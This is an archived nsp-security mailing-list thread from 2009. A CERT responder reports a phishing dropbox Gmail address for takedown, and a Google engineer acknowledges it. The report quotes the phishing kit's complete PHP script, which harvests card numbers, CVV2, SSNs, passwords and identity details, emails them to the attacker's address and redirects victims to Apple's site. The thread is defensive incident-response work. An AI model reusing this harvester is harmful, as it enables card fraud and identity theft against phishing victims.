[nsp-sec] Phishing dropbox @gmail.com
Peter Moody
pmoody at google.com
Fri Jun 19 06:39:50 EDT 2009
ack.
On Fri, Jun 19, 2009 at 3:33 AM, Torsten Voss<voss at dfn-cert.de> wrote:
> ----------- nsp-security Confidential --------
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Hello,
>
> we've found a phishing website with the dropbox at:
>
> spam.mails.new at gmail.com
>
> Please kill the address.
>
> Regards,
> Torsten, AS680
>
>
> <?
>
> $ip = getenv("REMOTE_ADDR");
> $message .= "----------------------------------------------------------\n";
> $message .= "FirstName : ".$_POST['5']."\n";
> $message .= "Last name : ".$_POST['6']."\n";
> $message .= "Address : ".$_POST['7']."\n";
> $message .= "City : ".$_POST['8']."\n";
> $message .= "State : ".$_POST['9']."\n";
> $message .= "Zipcode : ".$_POST['24']."\n";
> $message .= "Country : ".$_POST['11']."\n";
> $message .= "Extension : ".$_POST['12']."\n";
> $message .= "PhoneNumber : ".$_POST['12']."\n";
> $message .= "PhoneNumber2 : ".$_POST['13']."\n";;
> $message .= "Card number : ".$_POST['2']."\n";
> $message .= "Expiry month : ".$_POST['3']."\n";
> $message .= "Expiry year : ".$_POST['23']."\n";
> $message .= "CVV2 : ".$_POST['22']."\n";
> $message .= "Mother's maiden name : ".$_POST['19']."\n";
> $message .= "SSN : ".$_POST['15']."\n";
> $message .= "Birth month : ".$_POST['16']."\n";
> $message .= "Birth day : ".$_POST['17']."\n";
> $message .= "Birth year : ".$_POST['18']."\n";
> $message .= "Email address : ".$_POST['25']."\n";
> $message .= "Password : ".$_POST['26']."\n";
>
> $message .= "--------------Madded by Eminem Naija-----------------------\n";
> $send = "spam.mails.new at gmail.com";
> $subject = "Ehijie u happy? : ".$_POST['2']."\n ";
> $headers = "From: iTunes<mail at satc.net>";
> $headers .= $_POST['eMailAdd']."\n";
> $headers .= "MIME-Version: 1.0\n";
> $arr=array($send, $IP);
> foreach ($arr as $send)
> {
> mail($send,$subject,$message,$headers);
> mail($to,$subject,$message,$headers);
> }
> header("Location:
> http://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/9314002/wo/lC25o8vmswyX2eduNQ3Q6b9hf7m/2.0.26.9.5.7.1");
>
>
> $domain = $_SERVER['HTTP_HOST'];
>
> ?>
>
>
> - --
> Dipl.-Ing.(FH) Torsten Voss (Incident Response Team), Phone +49 40 808077-634
>
> DFN-CERT Services GmbH, https://www.dfn-cert.de, Phone +49 40 808077-555
> Sitz / Register: Hamburg, AG Hamburg, HRB 88805, Ust-IdNr.: DE 232129737
> Sachsenstrasse 5, 20097 Hamburg/Germany, CEO: Dr. Klaus-Peter Kossakowski
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v2.0.4-svn0 (GNU/Linux)
> Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org
>
> iQEVAwUBSjtpjyXNv0Upg26pAQJuLAf/aoGh0/OThRvi9oc8QmH9LuZFljH3opjO
> lfBOHF6/freP8vHUFkP4X5RT/OW7P7K2TkjngiMa4YmAYfiM+XBVzzu4Ujq/AmgD
> Y039xVTncEe3+CyLzucxmCEtPFYLeoE0GoSvnJvzYHGhjL/c/Ngn+7Mp7i8GNMx1
> aMZOniBpW9oipQE3fvHjJsiUKMjioaxIAsOmhnD6casIn05Ms4Ej1o062lfVA2y3
> J5aFS0+On79X0TdBQklnocH7F3bsvZjsF5LLeoiG+pCfj7OWtPyFUIvx1FJplU9U
> pxQy5gnT7KjAXFk3wXPcy5UFe7QqiUBsb82QIf1aYQybyxuQNnz4qg==
> =vEex
> -----END PGP SIGNATURE-----
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security counter-measures.
> _______________________________________________
>
--
Peter Moody Google 1.650.253.7306
Network Security Engineer pgp:0xC3410038
More information about the nsp-security
mailing list